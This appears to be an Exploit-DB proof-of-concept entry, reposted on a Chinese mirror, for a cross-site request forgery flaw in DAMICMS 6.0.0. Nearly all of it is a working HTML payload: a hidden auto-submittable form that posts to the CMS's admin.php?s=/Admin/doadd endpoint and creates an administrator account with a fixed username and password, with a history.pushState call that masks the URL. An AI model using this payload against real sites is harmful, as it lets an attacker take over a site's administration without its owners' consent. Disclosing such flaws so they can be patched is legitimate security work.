DAMICMS 6.0.0 – Cross-Site Request Forgery (Add Admin)

  • 作者: bay0net
    日期: 2018-07-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44960/
  • <!--
    # Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
    # Date: 2018-06-30
    # Exploit Author: bay0net
    # Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html
    # Software Link: https://www.damicms.com/Down#
    # Version:DAMICMS_V6.0.0
    # CVE : N/A
    
    # DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.
    # The payload for attack is as follows.
    -->
    
    <html>
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST">
    <input type="hidden" name="username" value="test22" />
    <input type="hidden" name="password" value="test22" />
    <input type="hidden" name="role_id" value="1" />
    <input type="hidden" name="Submit" value="添加" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>